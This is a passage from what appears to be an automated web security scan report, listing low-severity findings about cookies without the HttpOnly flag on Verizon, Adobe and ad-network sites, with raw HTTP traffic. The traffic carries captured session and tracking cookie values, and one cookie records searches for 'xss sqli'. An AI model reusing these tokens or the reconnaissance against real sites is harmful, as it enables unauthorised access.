ih="b!!!!)!->h]!!!!$=3]pm!.`.U!!!!#=3H<:!0eUs!!!!#=1F/L!34fN!!!!#=/b4V!34fX!!!!#=/b4X!3DVF!!!!#=1F/N"; BX=8d7n6ot73ufk2&b=4&s=8m&t=219; pv1="b!!!!#!$'!L!$5*F!$kY3!3DVF!%JP7!!!!$!?5%!'2po7!?Q8(!'RQt~~~~~~~=1F/N=3CT*!!!(["; uid=uid=1071eb2c-d4cd-11e0-892f-78e7d1f5079e&_hmacv=1&_salt=321185080&_keyid=k1&_hmac=d75501ec81bb906d515b301e794922b4d10045fa; vuday1=FOL4uN:@*g1:+3O

Response

HTTP/1.1 302 Found
Date: Mon, 05 Sep 2011 22:14:38 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!#r!!!?H!!!!$=1j[w!!*l]!!!!#=.lv=!!+^.!!!!#=3Elr!!-?2!!!!-=38n'!!-C,!!!!#=3BC@!!-O3!!!!*=38n'!!.uv!!!!#=3Elr!!/pp!!!!#=3Elr!!1CB!!!!$=3_$E!!1SP!!!!#=38n,!!3O?!!!!#=3BC@!!UHs!!!!#=0>(p!!X41!!!!#=0>(p!!Zwa!!!!-=38n'!!g]C!!!!#=3Elr!!itb!!!!'=3]pn!!nAq!!!!#=3Elr!!pf4!!!!#=3BC@!!tP)!!!!#=3]pn!!tV-!!!!#=3]pn!!v'l!!!!#=3Elr!!vRm!!!!#=3]pn!!vRq!!!!%=3]pn!!vRr!!!!%=3]pn!!vRv!!!!#=3]pn!!vRw!!!!'=3]pn!!vRx!!!!%=3]pn!!vRy!!!!%=3]pn!!va'!!!!#=3Elr!!y!r!!!!#=3]pn!!y!v!!!!#=3]pn!#!,g!!!!'=3]pn!#!y?!!!!#=.lv=!#%v(!!!!#=2w#K!#.dO!!!!$=2Z2#!#.g1!!!!#=.e%I!#.mL!!!!$=0bvK!#/t]!!!!$=09of!#0Kr!!!!$=3M3E!#0L2!!!!%=1Cp-!#0fU!!!!$=3]pn!#0fW!!!!$=3]pn!#2A_!!!!#=3]pn!#2Ad!!!!#=3]pn!#2Gj!!!!#=3BC@!#2Oe!!!!#=1j[w!#2Of!!!!#=1j[w!#2XY!!!!#=3]pn!#44f!!!!%=3]pn!#44h!!!!%=3]pn!#5nZ!!!!#=3]pn!#7(x!!!!'=38n'!#7)a!!!!%=38n'!#?dj!!!!#=/(P2!#?dk!!!!#=/(P2!#C,X!!!!#=3Elr!#M7R!!!!#=09!!!#M7S!!!!#=1>Dd!#MTC!!!!%=3]pn!#MTH!!!!%=3]pn!#MTI!!!!%=3]pn!#MTJ!!!!%=3]pn!#N[7!!!!#=2w#K!#N[8!!!!#=09!!!#Ps:!!!!#=2[IV!#Q*T!!!!$=2Z2#!#Q,i!!!!#=2Z2#!#ROs!!!!#=3Elr!#SCj!!!!$=2Z2#!#SCk!!!!$=2Z2#!#Sw^!!!!#=/(P2!#TnE!!!!#=3]pn!#U5q!!!!#=09!!!#UDP!!!!%=3]pn!#YCf!!!!#=2w#K!#Ym:!!!!#=1,!r!#Ym>!!!!#=1,!r!#Z8E!!!!*=38n'!#Zgs!!!!%=38n'!#ZhT!!!!'=38n'!#[R[!!!!%=3]pn!#aG>!!!!$=2Z2#!#aP0!!!!'=/<(G!#bGa!!!!#=09!!!#bGi!!!!#=09!!!#bw^!!!!*=38n'!#dCX!!!!%=3Stu!#fBj!!!!*=38n'!#fBk!!!!*=38n'!#fBm!!!!*=38n'!#fBn!!!!*=38n'!#fG+!!!!%=38n'!#fvy!!!!(=3H<?!#g<y!!!!%=38n'!#nb^!!!!#=3M3D!#t>.!!!!#=1,!r!#tLr!!!!#=1+1N!#tM)!!!!#=3]pn!#tn2!!!!%=3]pn!#trp!!!!-=38n'!#uQD!!!!$=3_$E!#uQG!!!!$=3_$E!#ust!!!!$=2Z2#!#usu!!!!$=2Z2#!#uw*!!!!%=3]pn!#v,W!!!!#=09!!!#v,Y!!!!#=1>Dd!#v-$!!!!#=09!!!#wW9!!!!$=2Z2#!#x?H!!!!-=38n'!#xUN!!!!%=3]pn!#yM#!!!!$=2Z2#!$#4B!!!!$=38n'!$#9a!!!!#=1D5B!$#?.!!!!$=3H<B!$#R7!!!!#=3]pn!$#WA!!!!$=2Z2#!$$F#!!!!#=/bCH!$%'+!!!!$=/>v>!$%,!!!!!$=2Z2#!$%SB!!!!$=2Z2#!$'/Y!!!!#=09!!!$(!(!!!!-=38n'!$(!P!!!!*=38n'!$(Gt!!!!#=3]pn!$)gA!!!!#=09!!!$*a0!!!!$=2Z2#!$+M>!!!!#=3M3D!$,0h!!!!$=2Z2#!$,5d!!!!#=3Elr!$,jw!!!!#=2w#K!$-%:!!!!$=38n'!$-(b!!!!#=3]pn!$0Ge!!!!$=3M3H!$0VL!!!!%=38n'!$0VM!!!!%=38n'!$1]+!!!!+=38n'!$1g/!!!!%=1D5F!$2j$!!!!$=2Z2#!$3IO!!!!*=38n'!$3y-!!!!(=2w%w!$4ou!!!!$=2Z2#!$5)A!!!!#=09!!!$5Rt!!!!#=1>Dd!$5Ru!!!!#=2w#K!$8+W!!!!%=38n'!$8>S!!!!'=3H<B!$8Js!!!!#=/(P2!$8Ju!!!!#=/(P2!$:3.!!!!#=2w#K!$<DI!!!!*=38n'!$=Gi!!!!#=0_Lo!$=X=!!!!#=3H<6!$=p7!!!!#=2Z2#!$=p8!!!!#=2Z2#!$=s9!!!!#=3+WO!$>#M!!!!#=2Z2#!$>#N!!!!#=2Z2#!$>_#!!!!#=2Z2#!$?=*!!!!#=3Elr!$?i5!!!!#=3BC@!$?tC!!!!#=38n'"; path=/; expires=Wed, 04-Sep-2013 22:14:38 GMT
Set-Cookie: BX=8d7n6ot73ufk2&b=4&s=8m&t=219; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://www.googleadservices.com/pagead/conversion/1032222048/?label=ERk9CKz3kgIQ4OqZ7AM&guid=ON&script=0
Cache-Control: no-store
Last-Modified: Mon, 05 Sep 2011 22:14:38 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close

10.13. https://adwords.google.com/um/StartNewLogin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://adwords.google.com
Path:	/um/StartNewLogin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.14. http://ak1.abmr.net/is/cache.vzw.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/cache.vzw.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-EE1D8367D5AACB1E26AA8F0FBEBD6C10ADDCD00A522E6E0942A5B70F0B0B5323-6CB0DFCE7722E5BC43790569F97DA7EA856B7EEF1C2FB591154B5DCDB8F73D15; expires=Tue, 04-Sep-2012 22:14:34 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/cache.vzw.com?U=/globalnav/images/nav_bg_sprite.gif&V=3-7Tbed2GP0dnaoMNvnZ2eUgT58fMyPV8GBkYhYuHX82w1oxl053n8pXaDv2S97yea&I=4979291004F3928&D=verizonwireless.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/globalnav/css/globalnav-js.css?v=11-09
Cookie: 01AI=2-2-30E5D302E7B5AE52FB3FA64F3B114F4C89F6DA2CC7589E047F8A003B02A10801-7B9575B90C2ADB1B3A50CB744273B84103B43421BA655F664BF6383B75DF7234

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://cache.vzw.com/globalnav/images/nav_bg_sprite.gif?01AD=3lAIkR3iXBmXCwxuTNimn97d865hqXBlE_6DPM4OMu5fBEs-eIi6L_A&01RI=4979291004F3928&01NA=
Expires: Mon, 05 Sep 2011 22:14:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:14:34 GMT
Connection: close
Set-Cookie: 01AI=2-2-EE1D8367D5AACB1E26AA8F0FBEBD6C10ADDCD00A522E6E0942A5B70F0B0B5323-6CB0DFCE7722E5BC43790569F97DA7EA856B7EEF1C2FB591154B5DCDB8F73D15; expires=Tue, 04-Sep-2012 22:14:34 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

10.15. http://ak1.abmr.net/is/www22.verizon.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/www22.verizon.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-30E5D302E7B5AE52FB3FA64F3B114F4C89F6DA2CC7589E047F8A003B02A10801-7B9575B90C2ADB1B3A50CB744273B84103B43421BA655F664BF6383B75DF7234; expires=Tue, 04-Sep-2012 22:13:38 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www22.verizon.com?U=/Content/VerizonGlobalHome/images/i/welcome_txt.png&V=3-PtxfAmkJoPkxd63gt9J5IQ3XKbrkCHZUrNo4pIqf4ae5qOX%2fkQyvyg%3d%3d&I=9F535B8C084D6DA&D=verizon.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_landing.aspx
Cookie: 01AI=2-2-EC6E087E957D4D0A3545934FCB8D3C1B99B64863FCC14D306462E239165F9D1C-F808D72C3FE97181A94A7D7B4DA80EAA60A72A016141237C41FA5C587FB50FD6

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www22.verizon.com/Content/VerizonGlobalHome/images/i/welcome_txt.png?01AD=3JqCYcsE1rlAhTfmCIUyRZ-iggeiohK6a-FKkJ_aMvvIaMkdz3Ks80g&01RI=9F535B8C084D6DA&01NA=
Expires: Mon, 05 Sep 2011 22:13:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:13:38 GMT
Connection: close
Set-Cookie: 01AI=2-2-30E5D302E7B5AE52FB3FA64F3B114F4C89F6DA2CC7589E047F8A003B02A10801-7B9575B90C2ADB1B3A50CB744273B84103B43421BA655F664BF6383B75DF7234; expires=Tue, 04-Sep-2012 22:13:38 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

10.16. https://auth.verizon.com/amserver/UI/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://auth.verizon.com
Path:	/amserver/UI/Login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

AMAuthCookie=AQIC5wM2LY4SfczpWev%2Bj7wJV5p6Vi3At4%2BjPQ6Fv%2By5Kkk%3D%40AAJTSQACNjkAAlMxAAIwNg%3D%3D%23;Domain=.verizon.com;Path=/
AMAuthCookie=LOGOUT;Domain=.verizon.com;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /amserver/UI/Login HTTP/1.1
Host: auth.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.17. https://auth.verizon.net/amserver/UI/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://auth.verizon.net
Path:	/amserver/UI/Login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

AMAuthCookie=AQIC5wM2LY4SfczLMfAqxGV1489wz3vJJDjxw2SWemh5VQo%3D%40AAJTSQACMzAAAlMxAAIwNA%3D%3D%23;Domain=.verizon.net;Path=/
AMAuthCookie=LOGOUT;Domain=.verizon.net;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /amserver/UI/Login HTTP/1.1
Host: auth.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:34:40 GMT
Content-length: 0
Content-type: text/html
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-control: private
Pragma: no-cache
Connection: close
X-dsameversion: 7 2005Q4 patch 120954-05
Am_client_type: genericHTML
Location: https://www.verizon.net/ssowebapp/VOLPortalLoginnull
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfczLMfAqxGV1489wz3vJJDjxw2SWemh5VQo%3D%40AAJTSQACMzAAAlMxAAIwNA%3D%3D%23;Domain=.verizon.net;Path=/
Set-cookie: amlbcookie=04;Domain=.verizon.net;Path=/
Set-cookie: AMAuthCookie=LOGOUT;Domain=.verizon.net;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/

10.18. http://cache.vzw.com/globalnav/images/nav_bg_sprite.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cache.vzw.com
Path:	/globalnav/images/nav_bg_sprite.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

V1Z2=3Xxb5cGQpT1L4o_oOLroIebqfANPB4UFu_z48jlyljwyA3Qbv3rwiCA; expires=Mon, 03-Oct-2011 22:14:35 GMT; path=/; domain=.vzw.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /globalnav/images/nav_bg_sprite.gif?01AD=3Xxb5cGQpT1L4o_oOLroIebqfANPB4UFu_z48jlyljwyA3Qbv3rwiCA&01RI=4979291004F3928&01NA= HTTP/1.1
Host: cache.vzw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/globalnav/css/globalnav-js.css?v=11-09
Cookie: V1Z2=CT-1

Response

HTTP/1.1 200 OK
Server: None
Content-Type: image/gif
Last-Modified: Tue, 12 Jul 2011 03:47:11 GMT
Content-Length: 1017
ETag: "3f9-4e1bc3bf"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:14:35 GMT
Connection: close
Set-Cookie: V1Z2=3Xxb5cGQpT1L4o_oOLroIebqfANPB4UFu_z48jlyljwyA3Qbv3rwiCA; expires=Mon, 03-Oct-2011 22:14:35 GMT; path=/; domain=.vzw.com
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

GIF89a.....^...............................k............................................................................................m........t................................p..v........z........r
...[SNIP]...

10.19. http://community.adobe.com/help/about.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.adobe.com
Path:	/help/about.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ach-locale=en_US; Domain=adobe.com; Expires=Wed, 05-Oct-2011 22:34:46 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/about.html HTTP/1.1
Host: community.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:34:46 GMT
Set-Cookie: ach-locale=en_US; Domain=adobe.com; Expires=Wed, 05-Oct-2011 22:34:46 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 24306

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>

...[SNIP]...

10.20. http://content.atomz.com/pb00002f7b/publish/includes/css/marquee.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.atomz.com
Path:	/pb00002f7b/publish/includes/css/marquee.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

v1stsp=A835F590A06A9B4F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.atomz.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pb00002f7b/publish/includes/css/marquee.css HTTP/1.1
Host: content.atomz.com
Proxy-Connection: keep-alive
Referer: http://search.verizon.com/?tp=c&rv=b&q=xss%20sq
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lv=1314796046155; s_vnum=1317388046156%26vn%3D1

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:17:13 GMT
Server: Atomz/1.0
Set-Cookie: v1stsp=A835F590A06A9B4F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.atomz.com
Last-Modified: Wed, 24 Oct 2007 13:31:58 GMT
ETag: "34c02f5-76-471f494e"
Accept-Ranges: bytes
Content-Length: 118
Content-Type: text/css
Via: 1.1 content.atomz.com:84
X-Cache: MISS from content.atomz.com

.blackberry {background:url(http://content.atomz.com/pb00002f7b/publish/i/lifestyle-image.jpg) no-repeat top right;}

10.21. http://d.agkn.com/pixel!t=932! previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.agkn.com
Path:	/pixel!t=932!

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uuid=790101267012119588; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sat, 03-Sep-2016 22:15:21 GMT; Path=/
u=6|0BEgV%2BAZ5AAAwAAgBACcBBVirAAUAuwEAnwDOAQCfAJwBAJ8AnQEAnwCeAQCfAQJQfQHlAAAAAAPsKsEAAAAAApZbUAAAAAAOfLfdAWsAHQ%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Wed, 04-Sep-2013 22:15:21 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel!t=932!?che=71441105&atr=124134 HTTP/1.1
Host: d.agkn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/4357?ret=html&r=77101&phint=hc3%3D%7C&phint=logInDisplay%3D1&phint=lpLanguage%3Denglish&phint=lpMarket%3Dgeneric&phint=Keywords%3DCell%20Phone%20Deals%2C%20Cell%20Phone%20Discounts%2C%20Online%20Specials%2C%20Packages&phint=bk_t%3DCell%20Phone%20Savings%20%26%20Discounts%20-%20Verizon%20Wireless&phint=bk_k%3DCell%20Phone%20Deals%2C%20Cell%20Phone%20Discounts%2C%20Online%20Specials%2C%20Packages&phint=bk_pr%3Dhttp%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Findex.html
Cookie: uuid=790101267012119588; u=6|0BEgV0fs5AAAgAAYBACQBAtGcggUAuwEAggCcAQCCAJ0BAIIAngEAggDOAQCCAgDPfQBtAAIf7ON3HooAAAAAAmz0YAAAAAAOcraKAdsBAAOtugICUH0B5QAAAAAD7CrBAAAAAAKWW1AAAAAADny33QFrAAA%3D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=790101267012119588; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sat, 03-Sep-2016 22:15:21 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEgV%2BAZ5AAAwAAgBACcBBVirAAUAuwEAnwDOAQCfAJwBAJ8AnQEAnwCeAQCfAQJQfQHlAAAAAAPsKsEAAAAAApZbUAAAAAAOfLfdAWsAHQ%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Wed, 04-Sep-2013 22:15:21 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"43-1313398290000"
Last-Modified: Mon, 15 Aug 2011 08:51:30 GMT
Content-Type: image/gif
Content-Language: en-US
Content-Length: 43
Date: Mon, 05 Sep 2011 22:15:21 GMT
Connection: close

GIF89a.............!.......,...........D..;

10.22. http://d.mediabrandsww.com/r/dd/id/L21rdC8zL2NpZC8xMDU5NDA0L3QvMg/qry/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.mediabrandsww.com
Path:	/r/dd/id/L21rdC8zL2NpZC8xMDU5NDA0L3QvMg/qry/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=2644337228958821130; Domain=.mediabrandsww.com; Expires=Sat, 03-Mar-2012 22:18:33 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L21rdC8zL2NpZC8xMDU5NDA0L3QvMg/qry/ HTTP/1.1
Host: d.mediabrandsww.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2644337228958821130

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2644337228958821130; Domain=.mediabrandsww.com; Expires=Sat, 03-Mar-2012 22:18:33 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 05 Sep 2011 22:18:32 GMT

GIF89a.............!.......,...........D..;

10.23. http://developer.verizon.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developer.verizon.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cq5ublish-cookie=sjpcq5web1; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: developer.verizon.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; cq5ublish-cookie=sjpcq5web1

Response

HTTP/1.1 404 Not Found
Set-Cookie: cq5ublish-cookie=sjpcq5web1; path=/
Date: Mon, 05 Sep 2011 22:42:22 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 296
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<hr>
<
...[SNIP]...

10.24. http://developer.verizon.com/jsps/devCenters/Smart_Phone/Landing_Pages/AppendixICategoryDefinitions.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developer.verizon.com
Path:	/jsps/devCenters/Smart_Phone/Landing_Pages/AppendixICategoryDefinitions.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cq5ublish-cookie=sjpcq5web1; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsps/devCenters/Smart_Phone/Landing_Pages/AppendixICategoryDefinitions.jsp HTTP/1.1
Host: developer.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#q=site:verizon.com+online+news+webmail&hl=en&prmd=ivns&ei=RVBlTuSuBePmiAKx7NyXCg&start=10&sa=N&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; 